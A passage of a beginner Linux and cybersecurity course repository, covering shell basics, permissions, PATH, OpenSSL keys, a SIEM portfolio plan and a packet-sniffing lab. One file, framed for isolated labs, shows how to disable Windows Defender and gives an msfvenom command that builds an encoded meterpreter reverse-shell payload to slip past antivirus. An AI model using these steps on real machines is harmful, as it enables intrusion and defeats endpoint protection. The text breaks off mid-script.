   - Move `file2.txt` to a new directory called `backup`.

2. **File Permissions & Ownership**
   - Change permissions of `file1.txt` to **read & write for the owner, read for others**.
   - Change the owner of `file1_backup.txt` to another user.
   - Set `file3.txt` to be **executable** for all users.

3. **Viewing and Editing Files**
   - Use `nano` or `vim` to edit `file1.txt` and add some text.
   - Use `cat` to display the content of `file1.txt`.
   - Use `head` to show the first 5 lines of `file1.txt`.
   - Use `tail` to show the last 5 lines of `file1.txt`.

4. **Searching for Files & Text**
   - Find all `.txt` files inside `my_project`.
   - Search for the word "Hello" inside `file1.txt` using `grep`.
   - Count the number of lines in `file1.txt`.

---

## **Intermediate Tasks**
5. **User & Group Management**
   - Create a new user named `student1` (use `sudo adduser student1`).
   - Add `student1` to the `sudo` group.
   - Create a new group called `dev_team`.
   - Add `student1` to the `dev_team` group.

6. **Process & Resource Management**
   - List all running processes.
   - Find the PID of a process (e.g., `firefox` or `chrome`).
   - Kill a specific process using its PID.
   - Check system memory usage.

7. **Networking Tasks**
   - Check the system's IP address.
   - Ping a website like `google.com` and record the response time.
   - Display all open network ports.

8. **Archiving & Compression**
   - Create a compressed archive of `my_project` using `tar`.
   - Extract the archive to another location.
   - Zip a file and unzip it to another directory.

---

## **Advanced Tasks**
9. **Automation & Scripting**
   - Write a script that prints "Hello, Linux!" and the current date.
   - Modify the script to take a user's name as input and greet them.
   - Schedule the script to run every day at 10 AM using `cron`.

10. **System Monitoring & Security**
    - Check disk space usage.
    - List all users logged into the system.
    - Monitor system logs for login attempts.

---

## **Bonus Challenge**
- Write a **script** that:
  - Creates a backup of a folder.
  - Appends the current date to the backup filename.
  - Deletes backups older than 7 days.
--------------------------------------------------------------------------------
/projects/post-exploitation-research.md:
--------------------------------------------------------------------------------
Running `msfvenom` payloads on Windows 10 will often get blocked by Windows Defender or third-party antivirus software. This is expected behavior, as these payloads are designed to simulate malicious behavior.

> ⚠️ **Important:** Disabling Windows Defender or antivirus protection makes your system vulnerable. Only do this in a **safe, isolated lab environment** (e.g., a VM) used for ethical hacking, training, or malware analysis.

---

## ✅ Safe Method: Use a Virtual Machine (Recommended)

**Create an isolated VM** (using VirtualBox, VMware, or Hyper-V):

* Install Windows 10.
* Disable network connection (or use Host-only/NAT).
* Turn off Windows Defender in the VM only.
* Use snapshots to revert if anything breaks.

---

## ⚙️ If You're Still Doing It on Bare Metal (Not Recommended)

### 1. **Temporarily Disable Windows Defender:**

**Option A: Windows Security Settings**

1. Go to `Start` → type `Windows Security`.
2. Click on **Virus & threat protection**.
3. Click **Manage settings** under **Virus & threat protection settings**.
4. Toggle **Real-time protection** to **Off**.

**Option B: PowerShell (Run as Administrator)**

```powershell
Set-MpPreference -DisableRealtimeMonitoring $true
```

To enable again:

```powershell
Set-MpPreference -DisableRealtimeMonitoring $false
```

---

### 2. **Add Folder/File Exclusion Instead (Safer)**

This avoids turning off all Defender:

1. Go to **Windows Security** → **Virus & threat protection**.
2. Scroll to **Exclusions** → Click **Add or remove exclusions**.
3. Click **+ Add an exclusion** → Choose **Folder/File**.
4. Add the folder where you save your `msfvenom` payloads.

---

### 3. **Check for Third-Party Antivirus**

If you're using something like:

* Avast
* Bitdefender
* McAfee

…you'll need to open that software and:

* Disable real-time protection.
* Whitelist the payload folder.

---

### 🧪 Pro Tip for Stealth

* Use encoding or obfuscation in `msfvenom`:

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=your_port -f exe -e x86/shikata_ga_nai -i 5 -o payload.exe
```

Still might get flagged, but helps bypass basic detection.

---

## ⚠️ Final Reminder

Do this **only in a controlled lab**. If you're teaching, testing, or training, using tools like:

* VirtualBox
* Cuckoo Sandbox
* FLARE VM

…can provide a safer space to run and analyze malware-like files.

Would you like help setting up a proper **Windows test lab** with Defender turned off?
--------------------------------------------------------------------------------
/projects/fiver_siem_guide.md:
--------------------------------------------------------------------------------
## **🛠️ 1. Projects to Build for Your SIEM Portfolio**
You'll work on real-world use cases using open-source and enterprise SIEM tools (Splunk Free, Wazuh, Elastic SIEM, Microsoft Sentinel, or IBM QRadar Community Edition).

### **🔹 Project 1: SIEM Setup & Log Collection**
✅ **Goal:** Set up a SIEM system, collect logs from multiple sources (firewall, endpoint, cloud, etc.).
✅ **Tools:** Wazuh SIEM, Splunk Free, or Elastic SIEM.
✅ **Tasks:**
- Install and configure Wazuh or Splunk on a **cloud server (AWS, Azure, or local VM)**.
- Integrate **firewall logs (pfSense, Fortinet, Cisco)**.
- Collect **Windows Event Logs & Sysmon logs** from a Windows machine.
- Collect **Linux system logs** using Filebeat.
- Document your process and provide screenshots.
🔹 **Deliverable:** A detailed write-up with screenshots & a video demo.

---

### **🔹 Project 2: Real-Time Threat Detection & Alerts**
✅ **Goal:** Set up custom detection rules for cyber threats.
✅ **Tools:** Splunk, Microsoft Sentinel, IBM QRadar.
✅ **Tasks:**
- Install and configure **SIEM correlation rules**.
- Create detection rules for:
  🔥 Brute-force attacks on SSH & RDP.
  🔥 Unauthorized admin privilege escalation.
  🔥 Malware or suspicious PowerShell execution.
- Generate **alerts to detect threats in real time**.
- Simulate **malware or attack scenarios** using Atomic Red Team or Kali Linux.
🔹 **Deliverable:** A blog post or GitHub write-up showing threat detection in action.

---

### **🔹 Project 3: SIEM Dashboard & Incident Response**
✅ **Goal:** Create a **custom SIEM dashboard** for security operations.
✅ **Tools:** Splunk, Elastic SIEM, or Microsoft Sentinel.
✅ **Tasks:**
- Build **a security monitoring dashboard** with visualizations.
- Include logs from **firewall, Windows/Linux systems, and cloud logs**.
- Automate **incident response workflows** (email alerts, Slack notifications).
🔹 **Deliverable:** A step-by-step guide or YouTube video on how you built it.

---

## **💡 2. Where to Host Your Portfolio?**
📝 **GitHub:** Create a repository with your SIEM projects.
🎥 **YouTube:** Record short **walkthrough videos**.
🖥️ **Blog/LinkedIn Articles:** Write in-depth posts about your projects.
📸 **Fiverr Gig Samples:** Upload **screenshots** from your projects as proof of expertise.

---

## **🚀 3. Bonus: Add a Certification to Stand Out!**
If you want **extra credibility**, get certified in:
- 📜 **Splunk Certified User** (for Splunk-based gigs).
- 📜 **Microsoft Security, Compliance, and Identity Fundamentals (SC-900)** (for Sentinel).
- 📜 **Elastic SIEM Specialist**.
- 📜 **IBM QRadar SIEM Certification**.
--------------------------------------------------------------------------------
/week1/day_1.md:
--------------------------------------------------------------------------------
### Navigation Basics in Linux

In Linux, navigation is one of the most essential skills for effectively using the command-line interface (CLI). By mastering a few basic commands, you can easily move between directories, view files and folders, and understand your current location within the system.

Here are some **key navigation commands** and how to use them:

---

### 1. **`cd` (Change Directory)**
The `cd` command is used to move from one directory to another.

- **Syntax:**
  ```bash
  cd /path/to/directory
  ```

- **Examples:**
  - Go to the home directory:
    ```bash
    cd ~
    ```
  - Move up one level (to the parent directory):
    ```bash
    cd ..
    ```
  - Change to a specific folder:
    ```bash
    cd /var/log
    ```
  - Return to the previous directory:
    ```bash
    cd -
    ```

---

### 2. **`pwd` (Print Working Directory)**
The `pwd` command shows your current directory (your location in the file system).

- **Syntax:**
  ```bash
  pwd
  ```

- **Example output:**
  ```
  /home/username/Documents
  ```

---

### 3. **`ls` (List Directory Contents)**
The `ls` command lists the files and directories in the current location.

- **Syntax:**
  ```bash
  ls
  ```

- **Examples:**
  - Basic listing:
    ```bash
    ls
    ```
  - Detailed listing (shows permissions, file size, etc.):
    ```bash
    ls -l
    ```
  - Include hidden files:
    ```bash
    ls -a
    ```

---

### 4. **`tree` (Directory Structure Visualization)**
The `tree` command displays a tree-like structure of directories and files. It helps visualize the hierarchy.

- **Syntax:**
  ```bash
  tree
  ```

- **Example:**
  ```bash
  tree /path/to/directory
  ```
  Output:
  ```
  /home/username
  ├── Documents
  ├── Downloads
  └── Pictures
  ```

*Note: The `tree` command might need to be installed on your system using a package manager (e.g., `sudo apt install tree` on Ubuntu).*

---

### Combining Commands
You can combine these commands to quickly navigate and explore the filesystem:
- Navigate to a directory and list its contents:
  ```bash
  cd /var/log && ls
  ```
- Show your current directory and its contents:
  ```bash
  pwd && ls
  ```

---

By mastering these basic commands, you'll efficiently move around your Linux filesystem and have better control over your files and directories!
--------------------------------------------------------------------------------
/projects/sniffing-network.md:
--------------------------------------------------------------------------------
## **Network Security Lab Exercise: Sniffers for Network and Protocol Analysis**

### **Background**
Network sniffers like **Wireshark** and **tcpdump** are tools used to capture and analyze network traffic. These tools help cybersecurity professionals inspect network protocols, identify suspicious activity, troubleshoot issues, and spot weaknesses such as credentials sent in plaintext or other unencrypted traffic.

Understanding how to use sniffers is a core skill in both offensive (pentesting) and defensive (blue team) roles.

---

### **Learning Objectives**
By the end of this exercise, you will:
- Understand what sniffers are and what they capture
- Use a sniffer (Wireshark or tcpdump) to analyze traffic
- Identify different protocols (HTTP, DNS, TCP, etc.)
- Extract useful information from captured packets (e.g., credentials, hosts, visited sites)

---

### **Prerequisites**
- Wireshark installed on the host or VM
- Optionally: tcpdump installed on a Linux VM (Kali or Ubuntu)
- Internet connection or access to a test network environment
- A browser or client to generate basic HTTP, DNS, or FTP traffic

---

### **Tasks**

#### **Step 1: Start a Packet Capture**
Use **tcpdump** to capture traffic:
```bash
sudo tcpdump -i eth0 -nn -v -w capture.pcap
```

#### **Step 2: Generate Traffic**
Perform simple actions like:
- Visit a website (`localhost/dvwa`)
- Use `ping` or `nslookup` from terminal
- Use `ftp` or `telnet` to connect to a local server

This generates traffic Wireshark can observe.

---

#### **Step 3: Analyze Protocols**
In Wireshark:
- Use the **"Protocol"** column to filter for:
  - `http`
  - `dns`
  - `tcp`
  - `ftp` (if tested)
- Use the **Filter bar**, e.g.:
  ```plaintext
  http.request
  dns
  tcp.port == 21
  ```

Then:
1. Open **Wireshark**.
2. Load the captured file.
3. Try to:
   - Identify the source and destination IPs
   - Observe TCP handshakes
   - See what sites or hosts were contacted

#### **Step 4: Extract Information**
From the captured traffic:
- Find the **Host** and **User-Agent** headers from HTTP requests
- Look for **GET** or **POST** requests and any visible parameters
- Try to spot credentials if HTTP Basic authentication was used (the `Authorization` header is only base64-encoded, not encrypted)

---

### **Validation Checklist**

| Task | Expected Output or Evidence |
|-----------------------------------------|----------------------------------------------------|
| Sniffer launched and packets captured | Screenshot or `.pcap` file showing packet data |
| Protocols filtered and identified | List of protocols observed (HTTP, DNS, TCP, etc.) |
| Packet details analyzed | IP addresses, flags, ports noted |
| Data extracted from a packet | Hostname, URL path, or login credentials shown |
--------------------------------------------------------------------------------
/projects/permission-ownership.md:
--------------------------------------------------------------------------------
## 📁 1. Viewing File Permissions

Use the `ls -l` command:

```bash
ls -l filename
```

### Example:

```bash
-rwxr-xr-- 1 root root 1234 Jun 19 13:00 script.sh
```

### Breakdown:

* `-rwxr-xr--` → Permissions
* `1` → Link count
* `root` → Owner
* `root` → Group
* `1234` → Size in bytes
* `Jun 19 13:00` → Timestamp
* `script.sh` → File name

---

## 🔐 2. Understanding Permissions

Format: `[File Type][Owner][Group][Others]`

| Symbol | Meaning |
| ------ | ------------- |
| `-` | Regular file |
| `d` | Directory |
| `r` | Read |
| `w` | Write |
| `x` | Execute |
| `-` | No permission |

Example:

```
-rwxr-xr--
│└┬┘└┬┘└┬┘
│ │  │  └── Others: r (read), - (no write), - (no execute)
│ │  └───── Group:  r (read), - (no write), x (execute)
│ └──────── Owner:  r (read), w (write), x (execute)
└────────── File type: - (regular file)
```

---

## 🛠️ 3. Changing Permissions – `chmod`

### Syntax:

```bash
chmod [permissions] filename
```

### A. **Symbolic Mode:**

```bash
chmod u+x script.sh   # Add execute to user
chmod g-w file.txt    # Remove write from group
chmod o=r file.txt    # Set others to read-only
```

### B. **Octal Mode:**

```bash
chmod 755 script.sh   # rwxr-xr-x
chmod 644 file.txt    # rw-r--r--
chmod 700 secret.txt  # rwx------
```

| Number | Permission | Meaning |
| ------ | ---------- | -------------- |
| 7 | rwx | Full access |
| 6 | rw- | Read + write |
| 5 | r-x | Read + execute |
| 4 | r-- | Read only |
| 0 | --- | No permission |

---

## 👤 4. Changing Ownership – `chown` and `chgrp`

### Change owner:

```bash
sudo chown newuser file.txt
```

### Change owner and group:

```bash
sudo chown newuser:newgroup file.txt
```

### Change group only:

```bash
sudo chgrp newgroup file.txt
```


## 5. Examples for Practice

### A. Make a script executable by owner only:

```bash
chmod 700 exploit.sh
```

### B. Give read/write to owner and read to everyone else:

```bash
chmod 644 report.txt
```

### C. Change owner to `kali` and group to `pentesters`:

```bash
sudo chown kali:pentesters shell.py
```



## Bonus: Recursively Change Permissions

* All files in a directory:

```bash
chmod -R 644 /path/to/files/
```

Note that `-R` applies `644` to the directories themselves as well, which strips their execute (traverse) bit and makes them unusable until fixed; limit the files pass to regular files with `find` and `-type f`, the same way the next command limits its pass to directories.

* All directories (and execute bit):

```bash
find /path -type d -exec chmod 755 {} \;
```

--------------------------------------------------------------------------------
/week3/command_help.md:
--------------------------------------------------------------------------------
## **Getting Help with Commands in Linux**

When working in the **Linux shell**, it's important to know how to get help with commands. Linux provides built-in tools to **understand command usage, syntax, and options**.

---

## **1. Using the `--help` Option**
Most commands support the `--help` flag, which provides a brief description of available options.

### **Example:**
```bash
ls --help
grep --help
cp --help
```
**Output:**
It displays a **short manual** for the command, including available options.

> **Activity:** Try running `--help` with different commands.

---

## **2. Using the `man` Command (Manual Pages)**
The `man` command shows the **detailed manual** for a command.

### **Syntax:**
```bash
man <command>
```
### **Example:**
```bash
man ls
man grep
man chmod
```
To **navigate**:
- **Up/Down arrows** → Scroll
- **Spacebar** → Next page
- **q** → Quit

> **Activity:** Use `man` to explore at least three different commands.

---

## **3. Using the `info` Command**
The `info` command provides **more detailed documentation** than `man`.
```bash
info ls
info grep
info bash
```
> **Activity:** Compare the `man` and `info` outputs for `ls`.

---

## **4. Using the `whatis` Command**
The `whatis` command gives a **one-line description** of a command.

### **Example:**
```bash
whatis ls
whatis grep
whatis chmod
```
> **Activity:** Try `whatis` on 5 different commands.

---

## **5. Using the `apropos` Command**
The `apropos` command **searches the manual pages** for related topics.

### **Example:**
```bash
apropos network
apropos file
```
**Use case:** If you don't know the exact command, but you know what you need.

> **Activity:** Search for commands related to "process" or "disk".

---

## **6. Using the `type` Command**
The `type` command tells you **whether a command is built-in or an external binary**.

### **Example:**
```bash
type ls
type echo
type cd
```
> **Activity:** Find out if `pwd` and `grep` are built-in or external.

---

## **7. Using the `which` and `whereis` Commands**
These commands help locate where an executable file is stored.

### **Example:**
```bash
which python
which bash
whereis ls
whereis nano
```
> **Activity:** Use `which` and `whereis` on different commands and compare their outputs.

---

## **8. Using the `help` Command (For Built-in Commands)**
For built-in **Bash** commands like `cd`, `echo`, or `exit`, use:
```bash
help cd
help echo
help exit
```
> **Activity:** Use `help` on 3 built-in commands.
--------------------------------------------------------------------------------
/week1/day4_delete.md:
--------------------------------------------------------------------------------
### **Creating Files in Linux**

Creating files is essential for organizing and storing data. Linux provides several commands to create both empty and pre-filled files.

---

#### **1. Using `touch`**
Creates an empty file.
- **Syntax:**
  ```bash
  touch filename
  ```
- **Example:**
  ```bash
  touch newfile.txt
  ```
  This creates an empty file named `newfile.txt`.

---

#### **2. Using `echo`**
Creates a file with text content.
- **Syntax:**
  ```bash
  echo "text" > filename
  ```
- **Example:**
  ```bash
  echo "Hello, world!" > newfile.txt
  ```
  This creates `newfile.txt` with the content `Hello, world!`.

---

#### **3. Using `cat`**
Allows you to create a file and input text directly into it.
- **Syntax:**
  ```bash
  cat > filename
  ```
- **Example:**
  ```bash
  cat > newfile.txt
  ```
  Type your content and press `Ctrl+D` to save and exit.

---

#### **4. Using `nano` or `vi`**
These are text editors that allow you to create and edit files interactively.
- **Example with `nano`:**
  ```bash
  nano newfile.txt
  ```
  Add content, then save and exit (`Ctrl+O` to save, `Ctrl+X` to exit).

---

### **Deleting Files in Linux**

Deleting files helps manage disk space by removing unnecessary or unwanted files. The `rm` command is commonly used.

---

#### **1. Using `rm`**
Deletes a file permanently.
- **Syntax:**
  ```bash
  rm filename
  ```
- **Example:**
  ```bash
  rm example.txt
  ```
  This deletes the file `example.txt`.

---

#### **2. Using `rm -i` (Interactive Mode)**
Asks for confirmation before deleting a file, preventing accidental deletion.
- **Example:**
  ```bash
  rm -i example.txt
  ```
  Prompts:
  ```
  rm: remove regular file 'example.txt'? y
  ```

---

#### **3. Deleting Multiple Files**
You can delete multiple files at once.
- **Example:**
  ```bash
  rm file1.txt file2.txt file3.txt
  ```

---

#### **4. Deleting Directories**
- **Using `rm -r`:** Deletes a directory and its contents recursively.
  ```bash
  rm -r directory_name
  ```
- **Using `rmdir`:** Deletes an **empty** directory.
  ```bash
  rmdir directory_name
  ```

---

### **Tips for Safe Deletion**
1. Use `rm -i` for confirmation when deleting important files.
2. Avoid using `rm` with wildcards (`*`) unless you're absolutely sure of its impact.
3. Use `ls` to check the files in a directory before deleting:
   ```bash
   ls
   ```

By mastering file creation and deletion, you'll have better control over your Linux filesystem!
--------------------------------------------------------------------------------
/week3/env_variable.md:
--------------------------------------------------------------------------------
## **Environment Variables in Shell Basics**

### **What Are Environment Variables?**
Environment variables are key-value pairs used by the **shell** and **programs** to store system-wide settings, user preferences, and configurations. They help control system behavior and provide essential information about the environment.

---

## **1. Viewing Environment Variables**
To display all environment variables, use:
```bash
printenv
env
```
To check a specific variable:
```bash
echo $HOME
echo $USER
echo $PATH
```
> **Activity:** Run `printenv` and identify key environment variables.

---

## **2. Common Environment Variables**
| **Variable** | **Description** |
|-------------|----------------|
| `$USER` | Shows the currently logged-in user. |
| `$HOME` | Home directory of the user. |
| `$SHELL` | The shell being used (e.g., `/bin/bash`). |
| `$PWD` | Current working directory. |
| `$PATH` | Directories where the shell looks for executable files. |
| `$EDITOR` | Default text editor (e.g., `vim` or `nano`). |
| `$LANG` | System language setting. |
| `$LOGNAME` | The name of the logged-in user. |

> **Activity:** Use `echo` to display values of different environment variables.

---

## **3. Setting and Modifying Environment Variables**
### **a. Temporarily Setting a Variable**
```bash
export MY_VAR="Hello, Linux!"
echo $MY_VAR
```
This variable will **only** exist in the current terminal session.

### **b. Permanently Setting a Variable**
To make a variable **persistent**, add it to:
- **Bash users:** `~/.bashrc`
- **Zsh users:** `~/.zshrc`
- **System-wide:** `/etc/environment` (this file takes plain `KEY=value` lines, not `export` commands)

Example:
```bash
echo 'export MY_VAR="Hello, World!"' >> ~/.bashrc
source ~/.bashrc
```

> **Activity:** Set a temporary variable, then make it permanent.

---

## **4. Unsetting and Deleting Variables**
To remove an environment variable:
```bash
unset MY_VAR
echo $MY_VAR  # Will return empty
```
> **Activity:** Set a variable, use `unset`, and verify it's removed.

---

## **5. Using Environment Variables in Scripts**
Variables are useful in **Bash scripting**.

Example script (`myscript.sh`):
```bash
#!/bin/bash
echo "Hello, $USER!"
echo "Your home directory is: $HOME"
```
Run the script:
```bash
chmod +x myscript.sh
./myscript.sh
```
> **Activity:** Create a script that uses `$USER` and `$HOME`.

---

## **6. Path and Command Execution**
The `$PATH` variable stores directories where the system looks for executable commands.

Example:
```bash
echo $PATH
```
To add a directory for the current session (append the same line to `~/.bashrc`, as in section 3b, to make it permanent):
```bash
export PATH=$PATH:/home/user/scripts
```
> **Activity:** Add a custom directory to `$PATH` and execute a script from it.
--------------------------------------------------------------------------------
/week1/keypair.md:
--------------------------------------------------------------------------------
### **🔹 Creating a Normal RSA Key Pair (Private & Public Key)**
If you just need a **basic key pair** (not a self-signed certificate), you can generate a standard **RSA key pair** (private and public keys) without the extra certificate-related commands.

---

## **Step 1: Generate the Private Key**
Run the following command to generate a **4096-bit RSA private key**:
```bash
openssl genpkey -algorithm RSA -out private_key.pem -pkeyopt rsa_keygen_bits:4096
```
✅ **This creates** `private_key.pem`, which contains your **private key**.

---

## **Step 2: Extract the Public Key**
Now, extract the **public key** from the private key:
```bash
openssl rsa -in private_key.pem -pubout -out public_key.pem
```
✅ **This creates** `public_key.pem`, which contains your **public key**.
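With the key pair from Steps 1 and 2 in hand, the following script (an added example, not part of these notes or of OpenSSL's own documentation) takes the encrypt/decrypt and sign/verify flow from `key_enc_dec.md` one step further: it shows that plain RSA refuses an input bigger than the key allows, how a hybrid RSA+AES scheme handles that, and that a signature stops verifying once a single byte of the file changes. It assumes `openssl` 1.1.1 or newer on `PATH` and uses `pkeyutl`, the supported replacement for `rsautl`; the function names, the temporary file names and the sample messages are constructed for the demo.

```shell
#!/bin/sh
# Added example, not part of the original notes: hybrid encryption of a file
# (RSA-OAEP wraps a random session key, AES-256-CBC encrypts the data) and a
# signature tamper check. Assumes `openssl` 1.1.1 or newer is on PATH and uses
# pkeyutl, the supported replacement for the deprecated rsautl command.
set -eu

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Key pair as in Steps 1 and 2 (2048 bits keeps the demo fast).
openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:2048 \
    -out "$WORK/private_key.pem" 2>/dev/null
openssl rsa -in "$WORK/private_key.pem" -pubout \
    -out "$WORK/public_key.pem" 2>/dev/null

# Plain RSA encryption only accepts an input smaller than the modulus minus
# padding (about 214 bytes for RSA-2048 with OAEP). Returns 0 when openssl
# refuses a 1 KiB input, 1 if it unexpectedly accepts it.
rsa_rejects_large_input() {
    openssl rand -out "$WORK/big.bin" 1024
    if openssl pkeyutl -encrypt -pubin -inkey "$WORK/public_key.pem" \
        -pkeyopt rsa_padding_mode:oaep \
        -in "$WORK/big.bin" -out "$WORK/big.enc" 2>/dev/null; then
        return 1
    fi
    return 0
}

# Hybrid scheme: a random hex session key is RSA-wrapped for the recipient and
# used (through PBKDF2) to AES-encrypt the file. Returns 0 when the recipient's
# decrypted copy matches the original message.
hybrid_roundtrip() {
    printf 'Hello, this is a secret message!\n' > "$WORK/message.txt"
    openssl rand -hex 32 > "$WORK/session.key"
    # Sender: wrap the session key with the recipient's public key ...
    openssl pkeyutl -encrypt -pubin -inkey "$WORK/public_key.pem" \
        -pkeyopt rsa_padding_mode:oaep \
        -in "$WORK/session.key" -out "$WORK/session.key.enc"
    # ... and encrypt the payload with the session key.
    openssl enc -aes-256-cbc -pbkdf2 -pass "file:$WORK/session.key" \
        -in "$WORK/message.txt" -out "$WORK/message.enc"
    # Recipient: unwrap the session key with the private key, then decrypt.
    openssl pkeyutl -decrypt -inkey "$WORK/private_key.pem" \
        -pkeyopt rsa_padding_mode:oaep \
        -in "$WORK/session.key.enc" -out "$WORK/session.key.dec"
    openssl enc -d -aes-256-cbc -pbkdf2 -pass "file:$WORK/session.key.dec" \
        -in "$WORK/message.enc" -out "$WORK/message.dec"
    [ "$(cat "$WORK/message.txt")" = "$(cat "$WORK/message.dec")" ]
}

# Sign the file, confirm it verifies, then change one digit and confirm that
# verification now fails (openssl dgst -verify exits non-zero on failure).
signature_detects_tamper() {
    printf 'Transfer 100 to account 42\n' > "$WORK/order.txt"
    openssl dgst -sha256 -sign "$WORK/private_key.pem" \
        -out "$WORK/order.sig" "$WORK/order.txt"
    openssl dgst -sha256 -verify "$WORK/public_key.pem" \
        -signature "$WORK/order.sig" "$WORK/order.txt" > /dev/null
    printf 'Transfer 900 to account 42\n' > "$WORK/order.txt"   # tampered copy
    if openssl dgst -sha256 -verify "$WORK/public_key.pem" \
        -signature "$WORK/order.sig" "$WORK/order.txt" > /dev/null 2>&1; then
        return 1
    fi
    return 0
}

# Run all three checks when executed directly.
for check in rsa_rejects_large_input hybrid_roundtrip signature_detects_tamper; do
    if "$check"; then echo "$check: OK"; else echo "$check: FAILED"; fi
done
```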

---

## **Step 3: Verify the Keys**
Check if the private key is valid:
```bash
openssl rsa -in private_key.pem -check
```
✅ **Expected output:**
```
RSA key ok
```

Check if the public key is valid:
```bash
openssl rsa -in public_key.pem -pubin -text -noout
```
✅ **Expected output:**
A readable format of the public key.

---

## **📌 Step 4 (Optional): Encrypt the Private Key**
For better security, you can encrypt the private key with **AES-256**:
```bash
openssl genpkey -algorithm RSA -out encrypted_private_key.pem -aes256 -pass pass:YourStrongPassword -pkeyopt rsa_keygen_bits:4096
```
✅ **The password given with `-pass` protects the key** and will be needed every time the private key is used. Leave out `-pass pass:...` to be prompted for the password interactively instead of placing it on the command line, where it would end up in the shell history and be visible to other users in the process list. Note that this command generates a fresh, encrypted key pair; it does not encrypt the existing `private_key.pem`.

---

## **📌 Summary of Commands**
| **Step** | **Command** |
|----------|------------|
| Generate a **private key** | `openssl genpkey -algorithm RSA -out private_key.pem -pkeyopt rsa_keygen_bits:4096` |
| Extract the **public key** | `openssl rsa -in private_key.pem -pubout -out public_key.pem` |
| Verify **private key** | `openssl rsa -in private_key.pem -check` |
| Verify **public key** | `openssl rsa -in public_key.pem -pubin -text -noout` |
| Encrypt **private key (optional)** | `openssl genpkey -algorithm RSA -out encrypted_private_key.pem -aes256 -pass pass:YourStrongPassword -pkeyopt rsa_keygen_bits:4096` |

---

### **📌 Key Differences Between This and the Previous Method**
| **Feature** | **Normal Key Pair (This Method)** | **Self-Signed Certificate (Previous Method)** |
|------------|--------------------------------|--------------------------------|
| **Purpose** | Used for **encryption, signing, and authentication** | Used for **SSL/TLS authentication** |
| **Files Generated** | `private_key.pem`, `public_key.pem` | `key.pem` (private), `cert.pem` (public cert) |
| **Requires a CN (Common Name)?** | ❌ No | ✅ Yes |
| **Encrypt Data?** | ✅ Yes, encrypt/sign messages | ✅ Yes, secure web connections (HTTPS) |

---

### **📌 What Can You Do With This Key Pair?**
- **🔐 Encrypt & Decrypt Messages** using RSA.
- **🖊️ Digitally Sign & Verify Data**.
- **🔑 Authenticate Users** (SSH key-based authentication).
--------------------------------------------------------------------------------
/week3/path_shell.md:
--------------------------------------------------------------------------------
## **Command Path in Shell Basics**

The **command path** in Linux determines where the system looks for executable files when a user types a command in the terminal. Understanding the **command path** is essential for running programs and scripts efficiently.

---

## **1. Understanding `$PATH` Variable**
The `$PATH` variable is an environment variable that stores directories where the system searches for executable commands.

### **Check Your Current Path**
```bash
echo $PATH
```
This will output a list of directories separated by colons (`:`), for example:
```
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/home/user/bin
```
The shell searches these directories in order, left to right, and runs the first matching executable it finds.

> **Activity:** Run `echo $PATH` and identify key directories.

---

## **2. Finding the Location of a Command**
To find where a command is located, use:

### **Which Command**
```bash
which ls
which python
which nano
```
This shows the **exact path** of an executable.

### **Whereis Command**
```bash
whereis ls
whereis bash
```
It provides more details, including source and documentation locations.

> **Activity:** Use `which` and `whereis` to check the paths of different commands.

---

## **3. Running Programs Using Absolute & Relative Paths**

### **a. Absolute Path (Full Path)**
An absolute path specifies the full location of a file or program.

Example:
```bash
/bin/ls
/usr/bin/python3
```
No matter which directory you're in, this will work.

### **b. Relative Path (Relative to Current Directory)**
A relative path depends on the current working directory.

Example:
```bash
./script.sh   # Runs script from current directory
../script.sh  # Runs script from parent directory
```

> **Activity:** Create a script, run it using absolute and relative paths.

---

## **4. Modifying the `$PATH` Variable**

### **a. Temporarily Adding a Directory to `$PATH`**
```bash
export PATH=$PATH:/home/user/scripts
```
Now, any script in `/home/user/scripts` can be run without specifying its path. Appending (`$PATH:/dir`) keeps the system directories ahead of yours; prepending (`/dir:$PATH`) lets a script in that directory shadow a system command of the same name, so only prepend directories that nobody else can write to.

### **b. Permanently Adding a Directory to `$PATH`**
To make it permanent, add the above line to:
- **Bash users:** `~/.bashrc`
- **Zsh users:** `~/.zshrc`
- **System-wide:** `/etc/profile`

Example:
```bash
echo 'export PATH=$PATH:/home/user/scripts' >> ~/.bashrc
source ~/.bashrc
```

> **Activity:** Add a directory to your `$PATH` and run a script from it.

---

## **5. Executing a Script Without `./`**
Normally, a script needs `./` to execute:
```bash
./myscript.sh
```
But if it's in `$PATH`, you can run it directly:
```bash
myscript.sh
```
Put the script's directory in `$PATH` rather than adding `.` (the current directory) itself: with `.` in `$PATH`, a file named like a common command in any directory you `cd` into would run in its place.

> **Activity:** Add a script directory to `$PATH` and execute a script without `./`.
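The search order and the `$PATH` hygiene points above, as an added example that is not part of the original notes: a POSIX shell script that resolves a command along a PATH string exactly as the shell does (left to right, first match wins) and audits the string for entries that let someone else decide what runs. The `path_*` function names and the sample PATH are this example's own.

```shell
#!/bin/sh
# Added example (not part of the original notes): resolve a command along a
# PATH string the way the shell does, and audit that PATH for risky entries.

# path_entries PATH_STRING
# Prints one entry per line. An empty entry ("::", or a leading/trailing ":")
# means "the current directory", so it is printed as "." to make that visible.
path_entries() {
    rest="$1:"
    while [ -n "$rest" ]; do
        entry=${rest%%:*}
        rest=${rest#*:}
        [ -z "$entry" ] && entry=.
        printf '%s\n' "$entry"
    done
}

# path_lookup PATH_STRING COMMAND
# Prints the first executable match (what `which` would report); entries are
# tried left to right and the first hit wins. Returns 1 if nothing matches.
path_lookup() {
    path_entries "$1" | {
        while IFS= read -r dir; do
            if [ -f "$dir/$2" ] && [ -x "$dir/$2" ]; then
                printf '%s\n' "$dir/$2"
                exit 0      # leaves the subshell; its status is the function's
            fi
        done
        exit 1
    }
}

# path_audit PATH_STRING
# Prints a WARN line for each entry that lets someone else decide what runs:
# the current directory, a relative entry (resolved against wherever you are),
# or a directory that any user can write to. A missing directory is only INFO,
# but whoever creates it later gains that position in the search order.
# Returns 1 if anything was flagged.
path_audit() {
    path_entries "$1" | {
        flagged=0
        while IFS= read -r dir; do
            case "$dir" in
                .)  echo "WARN current-directory entry: $dir"; flagged=1 ;;
                /*) if [ ! -d "$dir" ]; then
                        echo "INFO missing directory: $dir"
                    elif [ "$(ls -ld "$dir" | cut -c9)" = "w" ]; then
                        echo "WARN world-writable directory: $dir"; flagged=1
                    fi ;;
                *)  echo "WARN relative entry: $dir"; flagged=1 ;;
            esac
        done
        exit "$flagged"
    }
}

# path_demo: builds a constructed PATH in a scratch directory and runs both
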